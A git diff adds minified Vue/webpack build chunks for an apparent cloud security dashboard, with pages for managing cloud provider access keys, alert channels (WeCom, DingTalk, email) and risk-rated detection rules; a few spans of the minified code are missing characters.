w(S(t)),a,_):S(t)},k=n?f(w):"MAX_VALUE,MIN_VALUE,NaN,NEGATIVE_INFINITY,POSITIVE_INFINITY,EPSILON,isFinite,isInteger,isNaN,isSafeInteger,MAX_SAFE_INTEGER,MIN_SAFE_INTEGER,parseFloat,parseInt,isInteger".split(","),A=0;k.length>A;A++)o(w,C=k[A])&&!o(_,C)&&m(_,C,g(w,C));_.prototype=y,y.constructor=_,s(r,b,_)}},b775:function(e,t,a){"use strict";a("d3b7");var n=a("bc3a"),r=a.n(n),i=a("5c96"),s=r.a.create({baseURL:"/prod-api",timeout:5e3});s.interceptors.request.use((function(e){return e.headers["token"]=localStorage.getItem("token"),e.headers["website"]=localStorage.getItem("websiteDomain"),e.headers["roles"]=localStorage.getItem("roles"),e}),(function(e){return Promise.reject(e)})),s.interceptors.response.use((function(e){var t=e.data;return t}),(function(e){return Object(i["Notification"])({message:e.message,title:"错误",type:"error"}),Promise.reject(e)})),t["a"]=s},cafe:function(e,t,a){},ecf0:function(e,t,a){"use strict";a.r(t);var n=function(){var e=this,t=e.$createElement,a=e._self._c||t;return a("div",{staticClass:"dashboard-container"},[a("el-row",[a("el-form",{staticStyle:{"margin-top":"-15px","margin-bottom":"-16px"},attrs:{inline:!0,size:"small","hide-required-asterisk":""}},[a("el-form-item",[a("el-button",{attrs:{type:"primary",icon:"el-icon-plus",size:"small"},on:{click:e.drawerCreateOpera}},[e._v(" 新建云厂商配置")])],1)],1),a("el-table",{directives:[{name:"loading",rawName:"v-loading",value:e.listLoading,expression:"listLoading"}],staticClass:"headers",staticStyle:{width:"auto","margin-top":"10px"},attrs:{data:e.listDataObject.outSideListData,"element-loading-text":"加载中...",size:"small",border:""}},[a("el-table-column",{attrs:{label:"秘钥类型",align:"center",width:"220%"},scopedSlots:e._u([{key:"default",fn:function(t){return[0==t.row.cloudSecretType?a("span",[e._v("阿里云")]):e._e(),1==t.row.cloudSecretType?a("span",[e._v("腾讯云")]):e._e(),3==t.row.cloudSecretType?a("span",[e._v("华为云")]):e._e()]}}])}),a("el-table-column",{attrs:{label:"创建时间",width:"150%",align:"center"},scopedSlots:e._u([{key:"default",fn:function(t){return[e._v(" "+e._s(t.row.cloudSecretCreateTime)+" ")]}}])}),a("el-table-column",{attrs:{label:"更新时间",width:"150%",align:"center"},scopedSlots:e._u([{key:"default",fn:function(t){return[null==t.row.cloudSecretUpdateTime?a("span",[e._v("-")]):a("span",[e._v(e._s(t.row.cloudSecretUpdateTime))])]}}])}),a("el-table-column",{attrs:{label:"授权秘钥",width:"350%",align:"center"},scopedSlots:e._u([{key:"default",fn:function(t){return[e._v(" AccessKey: "+e._s(t.row.cloudAccessKey)+" "),a("br"),e._v(" AccessToken: "+e._s(t.row.cloudAccessToken)+" ")]}}])}),a("el-table-column",{attrs:{label:"授权状态",align:"center"},scopedSlots:e._u([{key:"default",fn:function(t){return[a("el-switch",{attrs:{value:1==t.row.cloudSecretStatus,"active-color":"#13ce66","inactive-color":"#ff4949"},on:{change:function(a){return e.StatusChange(t.row)}}})]}}])}),a("el-table-column",{attrs:{label:"操作",align:"center"},scopedSlots:e._u([{key:"default",fn:function(t){return[a("div",{staticClass:"grid-content bg-purple-light"},[a("el-button",{staticClass:"ml0 mt5",attrs:{size:"mini"},on:{click:function(a){return e.drawerDelete(t.row)}}},[e._v("删除")]),a("el-button",{staticClass:"ml0 mt5",attrs:{size:"mini"},on:{click:function(a){return e.drawerChangeOpera(t.row)}}},[e._v("修改")])],1)]}}])})],1),a("div",{staticClass:"row"},[a("pagination",{directives:[{name:"show",rawName:"v-show",value:e.listQuery.total>10,expression:"listQuery.total > 10"}],staticStyle:{"margin-left":"-20px","margin-top":"-10px"},attrs:{total:e.listQuery.total,page:e.listQuery.page,limit:e.listQuery.limit},on:{"update:page":function(t){return e.$set(e.listQuery,"page",t)},"update:limit":function(t){return e.$set(e.listQuery,"limit",t)},pagination:e.getList}})],1)],1),a("el-drawer",{attrs:{visible:e.drawerCreateStatus,direction:e.direction,size:e.newAlterSize,wrapperClosable:!1,title:"新建厂商秘钥"},on:{"update:visible":function(t){e.drawerCreateStatus=t}}},[a("div",{staticClass:"demo-drawer__content"},[a("div",{staticClass:"tip",staticStyle:{margin:"20px","margin-top":"-1px","font-size":"14px",color:"#5e6d82","line-height":"1.5em"}},[e._v(" 这里云厂商主要用于后续的数据抓取,所有服务都是在本地的,所以没有风险,放心创建、放心保存。 ")]),a("el-form",{ref:"createModel",staticStyle:{"margin-left":"5px","margin-right":"20px"},attrs:{model:e.createModel,inline:!1,"label-width":"100px"}},[a("el-form-item",{attrs:{label:"厂商选择: "}},[a("el-select",{attrs:{size:"small",placeholder:"请选择"},model:{value:e.createModel.cloudSecretType,callback:function(t){e.$set(e.createModel,"cloudSecretType",t)},expression:"createModel.cloudSecretType"}},e._l(e.selectOptions,(function(e){return a("el-option",{key:e.value,attrs:{label:e.label,value:e.value}})})),1)],1),a("el-form-item",{attrs:{label:"AccessKey: "}},[a("el-input",{attrs:{placeholder:"请输入云厂商AccessKey",size:"small"},model:{value:e.createModel.cloudAccessKey,callback:function(t){e.$set(e.createModel,"cloudAccessKey",t)},expression:"createModel.cloudAccessKey"}})],1),a("el-form-item",{attrs:{label:"AccessToken: "}},[a("el-input",{attrs:{placeholder:"请输入云厂商AccessToken",size:"small"},model:{value:e.createModel.cloudAccessToken,callback:function(t){e.$set(e.createModel,"cloudAccessToken",t)},expression:"createModel.cloudAccessToken"}})],1)],1),a("div",{staticClass:"demo-drawer__footer"},[a("el-button",{attrs:{size:"small"},on:{click:e.drawerCreateOpera}},[e._v(" 返回")]),a("el-button",{attrs:{type:"primary",size:"small"},on:{click:e.drawerCreate}},[e._v(" 新建云厂商秘钥")])],1)],1)]),a("el-drawer",{attrs:{visible:e.drawerChangeStatus,direction:e.direction,size:e.newAlterSize,wrapperClosable:!1,title:"修改厂商秘钥"},on:{"update:visible":function(t){e.drawerChangeStatus=t}}},[a("div",{staticClass:"demo-drawer__content"},[a("el-form",{ref:"changeModel",staticStyle:{"margin-left":"5px","margin-right":"20px"},attrs:{model:e.changeModel,inline:!1,"label-width":"100px"}},[a("el-form-item",{attrs:{label:"AccessKey: "}},[a("el-input",{attrs:{placeholder:"请输入云厂商AccessKey",size:"small"},model:{value:e.changeModel.cloudAccessKey,callback:function(t){e.$set(e.changeModel,"cloudAccessKey",t)},expression:"changeModel.cloudAccessKey"}})],1),a("el-form-item",{attrs:{label:"AccessToken: "}},[a("el-input",{attrs:{placeholder:"请输入云厂商AccessToken",size:"small"},model:{value:e.changeModel.cloudAccessToken,callback:function(t){e.$set(e.changeModel,"cloudAccessToken",t)},expression:"changeModel.cloudAccessToken"}})],1)],1),a("div",{staticClass:"demo-drawer__footer"},[a("el-button",{attrs:{size:"small"},on:{click:function(t){return e.drawerChangeOpera(void 0)}}},[e._v(" 返回")]),a("el-button",{attrs:{type:"primary",size:"small"},on:{click:e.drawerChange}},[e._v(" 修改云厂商秘钥")])],1)],1)])],1)},r=[],i=a("333d"),s=a("b775"),o=a("4328"),c=a.n(o);function l(e){return s["a"].post("/cloudSecret/lists",c.a.stringify(e))}function u(e){return s["a"].post("/cloudSecret/add",c.a.stringify(e))}function d(e){return s["a"].post("/cloudSecret/changeStatus",c.a.stringify(e))}function p(e){return s["a"].post("/cloudSecret/delete",c.a.stringify(e))}function f(e){return s["a"].post("/cloudSecret/change",c.a.stringify(e))}var g={name:"",components:{Pagination:i["a"]},props:{},data:function(){return{selectOptions:[{label:"阿里云",value:0},{label:"腾讯云",value:1}],drawerCreateStatus:!1,drawerChangeStatus:!1,listLoading:!1,newAlterSize:"20%",listQuery:{page:1,limit:10,total:0},listDataObject:{outSideListData:[]},createModel:{},changeModel:{},direction:"rtl"}},computed:{},watch:{},created:function(){},mounted:function(){this.getList()},methods:{drawerCreateOpera:function(){this.drawerCreateStatus?this.drawerCreateStatus=!1:this.drawerCreateStatus=!0},drawerChangeOpera:function(e){void 0!=e&&(this.changeModel=e),this.drawerChangeStatus?this.drawerChangeStatus=!1:this.drawerChangeStatus=!0},StatusChange:function(e){var t=this;this.$confirm("是否确定切换秘钥状态?","确认信息",{distinguishCancelAndClose:!0,confirmButtonText:"确定切换",cancelButtonText:"返回"}).then((function(){d({Id:e.Id}).then((function(e){1===e.status?(t.$message.success(e.msg),t.getList()):t.$message.error(e.msg)}))})).catch((function(e){}))},drawerCreate:function(){var e=this;u(this.createModel).then((function(t){1===t.status?(e.$message.success(t.msg),e.getList(),e.drawerCreateOpera()):e.$message.error("云厂商秘钥无效,请检查!")}))},drawerChange:function(){var e=this;f(this.changeModel).then((function(t){1===t.status?(e.$message.success(t.msg),e.getList(),e.drawerChangeOpera(void 0)):e.$message.error("云厂商秘钥无效,请检查!")}))},drawerDelete:function(e){var t=this;this.$confirm("确定要删除授权吗?","提示",{confirmButtonText:"确定",cancelButtonText:"取消",type:"warning"}).then((function(){p({Id:e.Id}).then((function(e){1===e.status&&(t.$message.success(e.msg),t.getList())}))})).catch((function(){}))},checkDv:function(){var e=document.body.clientWidth;e>1619&&(this.newAlterSize="15%")},getList:function(){var e=this;this.listLoading=!0;var t={page:this.listQuery.page,pageSize:this.listQuery.limit};l(t).then((function(t){e.listLoading=!1,1===t.status?(e.listDataObject.outSideListData=t.data.list,e.listQuery.page=t.data.page,e.listQuery.limit=t.data.pageSize,e.listQuery.total=t.data.total):e.$message.error(t.msg)}))}}},m=g,h=(a("74ab"),a("fbca"),a("2877")),b=Object(h["a"])(m,n,r,!1,null,"7b4f10d0",null);t["default"]=b.exports},f1df:function(e,t,a){"use strict";a("8312")},fbca:function(e,t,a){"use strict";a("cafe")}}]); \ No newline at end of file diff --git a/frontend/dist/static/js/chunk-0bee1a39.5850112e.js b/frontend/dist/static/js/chunk-0bee1a39.5850112e.js new file mode 100644 index 0000000..37bb489 --- /dev/null +++ b/frontend/dist/static/js/chunk-0bee1a39.5850112e.js @@ -0,0 +1 @@ +(window["webpackJsonp"]=window["webpackJsonp"]||[]).push([["chunk-0bee1a39"],{"18d2":function(e,t,n){"use strict";var i=n("18e9");e.exports=function(e){e=e||{};var t=e.reporter,n=e.batchProcessor,o=e.stateHandler.getState;if(!t)throw new Error("Missing required dependency: reporter.");function r(e,t){function n(){t(e)}if(i.isIE(8))o(e).object={proxy:n},e.attachEvent("onresize",n);else{var r=l(e);if(!r)throw new Error("Element is not detectable by this strategy.");r.contentDocument.defaultView.addEventListener("resize",n)}}function a(t){var n=e.important?" !important; ":"; ";return(t.join(n)+n).trim()}function s(e,r,s){s||(s=r,r=e,e=null),e=e||{};e.debug;function l(r,s){var l=a(["display: block","position: absolute","top: 0","left: 0","width: 100%","height: 100%","border: none","padding: 0","margin: 0","opacity: 0","z-index: -1000","pointer-events: none"]),c=!1,d=window.getComputedStyle(r),u=r.offsetWidth,f=r.offsetHeight;function h(){function n(){if("static"===d.position){r.style.setProperty("position","relative",e.important?"important":"");var n=function(t,n,i,o){function r(e){return e.replace(/[^-\d\.]/g,"")}var a=i[o];"auto"!==a&&"0"!==r(a)&&(t.warn("An element that is positioned static has style."+o+"="+a+" which is ignored due to the static positioning. The element will need to be positioned relative, so the style."+o+" will be set to 0. Element: ",n),n.style.setProperty(o,"0",e.important?"important":""))};n(t,r,d,"top"),n(t,r,d,"right"),n(t,r,d,"bottom"),n(t,r,d,"left")}}function a(){function e(t,n){if(!t.contentDocument){var i=o(t);return i.checkForObjectDocumentTimeoutId&&window.clearTimeout(i.checkForObjectDocumentTimeoutId),void(i.checkForObjectDocumentTimeoutId=setTimeout((function(){i.checkForObjectDocumentTimeoutId=0,e(t,n)}),100))}n(t.contentDocument)}c||n();var t=this;e(t,(function(e){s(r)}))}""!==d.position&&(n(d),c=!0);var u=document.createElement("object");u.style.cssText=l,u.tabIndex=-1,u.type="text/html",u.setAttribute("aria-hidden","true"),u.onload=a,i.isIE()||(u.data="about:blank"),o(r)&&(r.appendChild(u),o(r).object=u,i.isIE()&&(u.data="about:blank"))}o(r).startSize={width:u,height:f},n?n.add(h):h()}i.isIE(8)?s(r):l(r,s)}function l(e){return o(e).object}function c(e){if(o(e)){var t=l(e);t&&(i.isIE(8)?e.detachEvent("onresize",t.proxy):e.removeChild(t),o(e).checkForObjectDocumentTimeoutId&&window.clearTimeout(o(e).checkForObjectDocumentTimeoutId),delete o(e).object)}}return{makeDetectable:s,addListener:r,uninstall:c}}},"18e9":function(e,t,n){"use strict";var i=e.exports={};i.isIE=function(e){function t(){var e=navigator.userAgent.toLowerCase();return-1!==e.indexOf("msie")||-1!==e.indexOf("trident")||-1!==e.indexOf(" edge/")}if(!t())return!1;if(!e)return!0;var n=function(){var e,t=3,n=document.createElement("div"),i=n.getElementsByTagName("i");do{n.innerHTML="\x3c!--[if gt IE "+ ++t+"]>4?t:e}();return e===n},i.isLegacyOpera=function(){return!!window.opera}},"2cef":function(e,t,n){"use strict";e.exports=function(){var e=1;function t(){return e++}return{generate:t}}},"49ad":function(e,t,n){"use strict";e.exports=function(e){var t={};function n(n){var i=e.get(n);return void 0===i?[]:t[i]||[]}function i(n,i){var o=e.get(n);t[o]||(t[o]=[]),t[o].push(i)}function o(e,t){for(var i=n(e),o=0,r=i.length;on?n=o:o div::-webkit-scrollbar { "+d(["display: none"])+" }\n\n",a+="."+r+" { "+d(["-webkit-animation-duration: 0.1s","animation-duration: 0.1s","-webkit-animation-name: "+o,"animation-name: "+o])+" }\n",a+="@-webkit-keyframes "+o+" { 0% { opacity: 1; } 50% { opacity: 0; } 100% { opacity: 1; } }\n",a+="@keyframes "+o+" { 0% { opacity: 1; } 50% { opacity: 0; } 100% { opacity: 1; } }",i(a)}}function h(e){e.className+=" "+l+"_animation_active"}function p(e,n,i){if(e.addEventListener)e.addEventListener(n,i);else{if(!e.attachEvent)return t.error("[scroll] Don't know how to add event listeners.");e.attachEvent("on"+n,i)}}function m(e,n,i){if(e.removeEventListener)e.removeEventListener(n,i);else{if(!e.detachEvent)return t.error("[scroll] Don't know how to remove event listeners.");e.detachEvent("on"+n,i)}}function v(e){return o(e).container.childNodes[0].childNodes[0].childNodes[0]}function g(e){return o(e).container.childNodes[0].childNodes[0].childNodes[1]}function b(e,t){var n=o(e).listeners;if(!n.push)throw new Error("Cannot add listener to an element that is not detectable.");o(e).listeners.push(t)}function y(e,s,c){function u(){if(e.debug){var n=Array.prototype.slice.call(arguments);if(n.unshift(r.get(s),"Scroll: "),t.log.apply)t.log.apply(null,n);else for(var i=0;i9,expression:"total > 9"}],staticStyle:{"margin-left":"-20px","margin-top":"-10px"},attrs:{total:t.total,page:t.listQuery.page,limit:t.listQuery.limit},on:{"update:page":function(e){return t.$set(t.listQuery,"page",e)},"update:limit":function(e){return t.$set(t.listQuery,"limit",e)},pagination:t.getUserList}})],1),a("el-drawer",{attrs:{visible:t.messagePop,direction:t.direction,size:t.newAlterSize,title:"创建告警源"},on:{"update:visible":function(e){t.messagePop=e}}},[a("div",{staticClass:"demo-drawer__content"},[a("el-form",{ref:"numberData",staticStyle:{"margin-left":"20px"},attrs:{model:t.numberData,"label-width":"80px"}},[a("el-form-item",{attrs:{label:"告警源名:"}},[a("el-input",{staticClass:"ipt",attrs:{placeholder:"请输入告警源别名"},model:{value:t.numberData.alterSourceName,callback:function(e){t.$set(t.numberData,"alterSourceName",e)},expression:"numberData.alterSourceName"}})],1),a("el-form-item",{attrs:{label:"告警源:"}},[a("el-select",{attrs:{size:"small"},on:{change:t.handleChange},model:{value:t.numberData.grade,callback:function(e){t.$set(t.numberData,"grade",e)},expression:"numberData.grade"}},[a("el-option",{attrs:{label:"企业微信",value:"0"}}),a("el-option",{attrs:{label:"钉钉",value:"1"}}),a("el-option",{attrs:{label:"邮件",value:"2"}})],1)],1),t.Token_falg?a("el-form-item",{attrs:{label:"Token :"}},[a("el-input",{staticClass:"ipt",attrs:{placeholder:"请输入Token"},model:{value:t.numberData.Token,callback:function(e){t.$set(t.numberData,"Token",e)},expression:"numberData.Token"}})],1):t._e(),t.account_falg?a("el-form-item",{attrs:{label:"邮箱账号 :"}},[a("el-input",{staticClass:"ipt",attrs:{placeholder:"请输入邮箱账号"},model:{value:t.numberData.account,callback:function(e){t.$set(t.numberData,"account",e)},expression:"numberData.account"}})],1):t._e(),t.password_falg?a("el-form-item",{attrs:{label:"邮箱密码 :"}},[a("el-input",{staticClass:"ipt",attrs:{placeholder:"请输入邮箱密码"},model:{value:t.numberData.password,callback:function(e){t.$set(t.numberData,"password",e)},expression:"numberData.password"}})],1):t._e(),a("el-form-item",{attrs:{label:"是否启用 :"}},[a("el-switch",{attrs:{"active-color":"#13ce66","inactive-color":"#ff4949"},on:{change:function(e){return t.parens(e)}},model:{value:t.numberData.value,callback:function(e){t.$set(t.numberData,"value",e)},expression:"numberData.value"}})],1)],1),a("div",{staticClass:"demo-drawer__footer"},[a("el-button",{attrs:{size:"small"},on:{click:function(e){return t.returnBtn()}}},[t._v(" 返回")]),a("el-button",{attrs:{type:"primary",size:"small"},on:{click:function(e){return t.confirmEditBtn()}}},[t._v(" 保存")])],1)],1)]),a("el-dialog",{attrs:{title:"提示",visible:t.editUserPop,width:"25%"},on:{"update:visible":function(e){t.editUserPop=e}}},[a("span",[t._v("确认切换告警渠道状态吗?切换后就收不到提醒了。")]),a("span",{staticClass:"dialog-footer",attrs:{slot:"footer"},slot:"footer"},[a("el-button",{on:{click:function(e){t.editUserPop=!1}}},[t._v("取 消")]),a("el-button",{attrs:{type:"primary"},on:{click:function(e){return t.editSureBtn()}}},[t._v("确 定")])],1)]),a("el-dialog",{attrs:{title:"提示",visible:t.editUserDelPop,width:"25%"},on:{"update:visible":function(e){t.editUserDelPop=e}}},[a("span",[t._v("确认删除告警渠道状态吗?删除后就没有了。")]),a("span",{staticClass:"dialog-footer",attrs:{slot:"footer"},slot:"footer"},[a("el-button",{on:{click:function(e){t.editUserDelPop=!1}}},[t._v("取 消")]),a("el-button",{attrs:{type:"primary"},on:{click:function(e){return t.editSureDelBtn()}}},[t._v("确 定")])],1)])],1)},r=[],i=(a("d3b7"),a("25f0"),a("333d")),s=a("b775"),o=a("4328"),l=a.n(o);function u(t){return s["a"].post("/alterConfig/lists",l.a.stringify(t))}function c(t){return s["a"].post("/alterConfig/add",l.a.stringify(t))}function d(t){return s["a"].post("/alterConfig/delete",l.a.stringify(t))}function m(t){return s["a"].post("/alterConfig/changeStatus",l.a.stringify(t))}var f={name:"",components:{Pagination:i["a"]},props:{},data:function(){return{newAlterSize:"26%",editUserDelPop:!1,editUserPop:!1,numberData:{grade:"0",Token:"",account:"",password:"",value:"0"},direction:"rtl",messagePop:!1,editFlag:!0,listLoading:!1,userDataLists:[],userDataListsPage:{currentPage:1,pageSize:10,total:0},total:0,listQuery:{importance:void 0,title:void 0,type:void 0,page:1,limit:10},Token_falg:!0,account_falg:!1,password_falg:!1}},computed:{},watch:{},created:function(){},mounted:function(){this.getUserList(),this.checkDv()},methods:{checkDv:function(){var t=document.body.clientWidth;1440!=t&&(this.newAlterSize="20%")},testBtn:function(){},editSureDelBtn:function(){var t=this;d({id:this.id}).then((function(e){1===e.status?(t.$message.success(e.msg),t.editUserDelPop=!1,t.getUserList()):(t.$message.error(e.msg),t.editUserDelPop=!1,t.getUserList())}))},deleteBtn:function(t){this.id=t.id,this.editUserDelPop=!0},editSureBtn:function(){var t=this;m({id:this.id}).then((function(e){t.listLoading=!1,1===e.status?(t.$message.success(e.msg),t.editUserPop=!1,t.getUserList()):(t.$message.error(e.msg),t.editUserPop=!1,t.getUserList())}))},StatusChange:function(t){this.id=t.id,this.editUserPop=!0},returnBtn:function(){this.messagePop=!1},parens:function(t){this.numberData.value=1==t},confirmEditBtn:function(){var t=this;if(0!=this.numberData.grade.toString()&&1!=this.numberData.grade.toString()||this.numberData.Token){if(2==this.numberData.grade.toString()){if(!this.numberData.account)return void this.$message.error("邮件账号需要设置,否则无法发邮件!");if(!this.numberData.password)return void this.$message.error("邮件密码需要设置,否则无法发邮件!")}0==this.numberData.value?this.numberData.value=1:1==this.numberData.value&&(this.numberData.value=0),c({alterSourceType:this.numberData.grade.toString(),alterConfigToken:this.numberData.Token,alterConfigEmailUsername:this.numberData.account,alterConfigEmailPassWord:this.numberData.password,alterConfigStatus:this.numberData.value,alterSourceName:this.numberData.alterSourceName}).then((function(e){1===e.status?(t.$message.success(e.msg),t.messagePop=!1,t.getUserList()):(t.$message.error(e.msg),t.messagePop=!1,t.getUserList())}))}else this.$message.error("token需要配置,否则无法发送告警!")},handleChange:function(t){0==t||1==t?(this.Token_falg=!0,this.account_falg=!1,this.password_falg=!1):2==t&&(this.Token_falg=!1,this.account_falg=!0,this.password_falg=!0)},creatSourceBtn:function(){this.numberData.grade="0",this.numberData.Token="",this.numberData.account="",this.numberData.password="",this.Token_falg=!0,this.account_falg=!1,this.password_falg=!1,this.messagePop=!0},stateFormat:function(t,e){return 0===t.alterSourceType?"企业微信":1===t.alterSourceType?"钉钉":2===t.alterSourceType?"邮件":void 0},getUserList:function(){var t=this;this.listLoading=!0,u({page:this.listQuery.page,pageSize:this.listQuery.limit}).then((function(e){t.listLoading=!1,1===e.status?(t.userDataLists=e.data.list,t.listQuery.page=e.data.page,t.listQuery.limit=e.data.pageSize,t.total=e.data.total):t.$message.error(e.msg)}))}}},p=f,g=(a("dabc"),a("9a5d"),a("2877")),h=Object(g["a"])(p,n,r,!1,null,"039dff9a",null);e["default"]=h.exports},8312:function(t,e,a){},"9a5d":function(t,e,a){"use strict";a("2e29")},a9e3:function(t,e,a){"use strict";var n=a("83ab"),r=a("da84"),i=a("94ca"),s=a("6eeb"),o=a("5135"),l=a("c6b6"),u=a("7156"),c=a("c04e"),d=a("d039"),m=a("7c73"),f=a("241c").f,p=a("06cf").f,g=a("9bf2").f,h=a("58a8").trim,b="Number",v=r[b],S=v.prototype,w=l(m(S))==b,y=function(t){var e,a,n,r,i,s,o,l,u=c(t,!1);if("string"==typeof u&&u.length>2)if(u=h(u),e=u.charCodeAt(0),43===e||45===e){if(a=u.charCodeAt(2),88===a||120===a)return NaN}else if(48===e){switch(u.charCodeAt(1)){case 66:case 98:n=2,r=49;break;case 79:case 111:n=8,r=55;break;default:return+u}for(i=u.slice(2),s=i.length,o=0;or)return NaN;return parseInt(i,n)}return+u};if(i(b,!v(" 0o1")||!v("0b1")||v("+0x1"))){for(var D,_=function(t){var e=arguments.length<1?0:t,a=this;return a instanceof _&&(w?d((function(){S.valueOf.call(a)})):l(a)!=b)?u(new v(y(e)),a,_):y(e)},k=n?f(v):"MAX_VALUE,MIN_VALUE,NaN,NEGATIVE_INFINITY,POSITIVE_INFINITY,EPSILON,isFinite,isInteger,isNaN,isSafeInteger,MAX_SAFE_INTEGER,MIN_SAFE_INTEGER,parseFloat,parseInt,isInteger".split(","),C=0;k.length>C;C++)o(v,D=k[C])&&!o(_,D)&&g(_,D,p(v,D));_.prototype=S,S.constructor=_,s(r,b,_)}},b775:function(t,e,a){"use strict";a("d3b7");var n=a("bc3a"),r=a.n(n),i=a("5c96"),s=r.a.create({baseURL:"/prod-api",timeout:5e3});s.interceptors.request.use((function(t){return t.headers["token"]=localStorage.getItem("token"),t.headers["website"]=localStorage.getItem("websiteDomain"),t.headers["roles"]=localStorage.getItem("roles"),t}),(function(t){return Promise.reject(t)})),s.interceptors.response.use((function(t){var e=t.data;return e}),(function(t){return Object(i["Notification"])({message:t.message,title:"错误",type:"error"}),Promise.reject(t)})),e["a"]=s},dabc:function(t,e,a){"use strict";a("2033")},f1df:function(t,e,a){"use strict";a("8312")}}]); \ No newline at end of file diff --git a/frontend/dist/static/js/chunk-141df175.d7ad8ec2.js b/frontend/dist/static/js/chunk-141df175.d7ad8ec2.js new file mode 100644 index 0000000..981778a --- /dev/null +++ b/frontend/dist/static/js/chunk-141df175.d7ad8ec2.js @@ -0,0 +1 @@ +(window["webpackJsonp"]=window["webpackJsonp"]||[]).push([["chunk-141df175"],{"029b":function(e,t,l){},"333d":function(e,t,l){"use strict";var s=function(){var e=this,t=e.$createElement,l=e._self._c||t;return l("div",{staticClass:"pagination-container",class:{hidden:e.hidden}},[l("el-pagination",e._b({attrs:{background:e.background,"current-page":e.currentPage,"page-size":e.pageSize,layout:e.layout,"page-sizes":e.pageSizes,total:e.total},on:{"update:currentPage":function(t){e.currentPage=t},"update:current-page":function(t){e.currentPage=t},"update:pageSize":function(t){e.pageSize=t},"update:page-size":function(t){e.pageSize=t},"size-change":e.handleSizeChange,"current-change":e.handleCurrentChange}},"el-pagination",e.$attrs,!1))],1)},a=[];l("a9e3");Math.easeInOutQuad=function(e,t,l,s){return e/=s/2,e<1?l/2*e*e+t:(e--,-l/2*(e*(e-2)-1)+t)};var n=function(){return window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||function(e){window.setTimeout(e,1e3/60)}}();function i(e){document.documentElement.scrollTop=e,document.body.parentNode.scrollTop=e,document.body.scrollTop=e}function r(){return document.documentElement.scrollTop||document.body.parentNode.scrollTop||document.body.scrollTop}function o(e,t,l){var s=r(),a=e-s,o=20,u=0;t="undefined"===typeof t?500:t;var c=function e(){u+=o;var r=Math.easeInOutQuad(u,s,a,t);i(r),u2)if(u=h(u),t=u.charCodeAt(0),43===t||45===t){if(l=u.charCodeAt(2),88===l||120===l)return NaN}else if(48===t){switch(u.charCodeAt(1)){case 66:case 98:s=2,a=49;break;case 79:case 111:s=8,a=55;break;default:return+u}for(n=u.slice(2),i=n.length,r=0;ra)return NaN;return parseInt(n,s)}return+u};if(n(v,!b(" 0o1")||!b("0b1")||b("+0x1"))){for(var S,_=function(e){var t=arguments.length<1?0:e,l=this;return l instanceof _&&(A?d((function(){w.valueOf.call(l)})):o(l)!=v)?u(new b(R(t)),l,_):R(t)},y=s?g(b):"MAX_VALUE,MIN_VALUE,NaN,NEGATIVE_INFINITY,POSITIVE_INFINITY,EPSILON,isFinite,isInteger,isNaN,isSafeInteger,MAX_SAFE_INTEGER,MIN_SAFE_INTEGER,parseFloat,parseInt,isInteger".split(","),k=0;y.length>k;k++)r(b,S=y[k])&&!r(_,S)&&f(_,S,m(b,S));_.prototype=w,w.constructor=_,i(a,v,_)}},b775:function(e,t,l){"use strict";l("d3b7");var s=l("bc3a"),a=l.n(s),n=l("5c96"),i=a.a.create({baseURL:"/prod-api",timeout:5e3});i.interceptors.request.use((function(e){return e.headers["token"]=localStorage.getItem("token"),e.headers["website"]=localStorage.getItem("websiteDomain"),e.headers["roles"]=localStorage.getItem("roles"),e}),(function(e){return Promise.reject(e)})),i.interceptors.response.use((function(e){var t=e.data;return t}),(function(e){return Object(n["Notification"])({message:e.message,title:"错误",type:"error"}),Promise.reject(e)})),t["a"]=i},ce6f:function(e,t,l){"use strict";l.r(t);var s=function(){var e=this,t=e.$createElement,l=e._self._c||t;return l("div",{staticClass:"dashboard-container"},[l("el-form",{staticStyle:{"margin-top":"-15px"},attrs:{inline:!0,size:"mini",model:e.searchService,"hide-required-asterisk":""}},[l("el-form-item",[l("el-button",{attrs:{type:"primary",icon:"el-icon-plus",size:"small"},on:{click:function(t){return e.newRulesBtn()}}},[e._v(" 新建规则")])],1),l("el-form-item",[l("el-input",{attrs:{size:"small",placeholder:"请输入规则名称"},model:{value:e.searchService.interviewer,callback:function(t){e.$set(e.searchService,"interviewer",t)},expression:"searchService.interviewer"}})],1),l("el-form-item",{attrs:{size:"small"}},[l("el-select",{attrs:{size:"small"},on:{change:e.handleChange},model:{value:e.searchService.RiskLevel,callback:function(t){e.$set(e.searchService,"RiskLevel",t)},expression:"searchService.RiskLevel"}},[l("el-option",{attrs:{label:"低危",value:"0"}}),l("el-option",{attrs:{label:"中危",value:"1"}}),l("el-option",{attrs:{label:"高危",value:"2"}})],1)],1),l("el-form-item",{attrs:{size:"small"}},[l("el-button",{attrs:{type:"primary",icon:"el-icon-search",size:"small"},on:{click:e.searchServiceBtn}},[e._v("检索")])],1),l("el-form-item",{attrs:{size:"small"}},[l("el-button",{attrs:{title:e.msg,type:"success",size:"small",icon:"el-icon-question"},on:{click:function(t){return e.editionRulesBtn()}}},[e._v(" 更新商业版规则 ")])],1)],1),l("el-table",{directives:[{name:"loading",rawName:"v-loading",value:e.listLoading,expression:"listLoading"}],key:e.searchService.region,staticClass:"headers",staticStyle:{width:"auto"},attrs:{border:"",data:e.regulationLists,size:"small","element-loading-text":"加载中..."},on:{"sort-change":e.handleSort}},[l("el-table-column",{attrs:{label:"规则名称",align:"left",width:"300%"},scopedSlots:e._u([{key:"default",fn:function(t){return[l("span",[e._v(e._s(t.row.rulesName))])]}}])}),l("el-table-column",{attrs:{label:"风险级别",align:"center"},scopedSlots:e._u([{key:"default",fn:function(t){return[0==t.row.rulesLevel?l("span",[l("el-tag",{attrs:{type:"success",size:"mini"}},[e._v("低危")])],1):e._e(),1==t.row.rulesLevel?l("span",[l("el-tag",{attrs:{type:"warning",size:"mini"}},[e._v("中危")])],1):e._e(),2==t.row.rulesLevel?l("span",[l("el-tag",{attrs:{type:"danger",size:"mini"}},[e._v("高危")])],1):e._e()]}}])}),l("el-table-column",{attrs:{label:"触发量",align:"center",width:"200%",sortable:"custom",prop:"rulesTriggerCount"},scopedSlots:e._u([{key:"default",fn:function(t){return[l("span",{staticClass:"sbadge"},[e._v(e._s(t.row.rulesTriggerCount)+"/次")])]}}])}),l("el-table-column",{attrs:{label:"创建时间",align:"center"},scopedSlots:e._u([{key:"default",fn:function(t){return[l("span",[e._v(e._s(t.row.rulesCreateTime))])]}}])}),l("el-table-column",{attrs:{label:"规则状态",align:"center",formatter:e.stateFormat_status}}),l("el-table-column",{attrs:{label:"操作",width:"175px",align:"center"},scopedSlots:e._u([{key:"default",fn:function(t)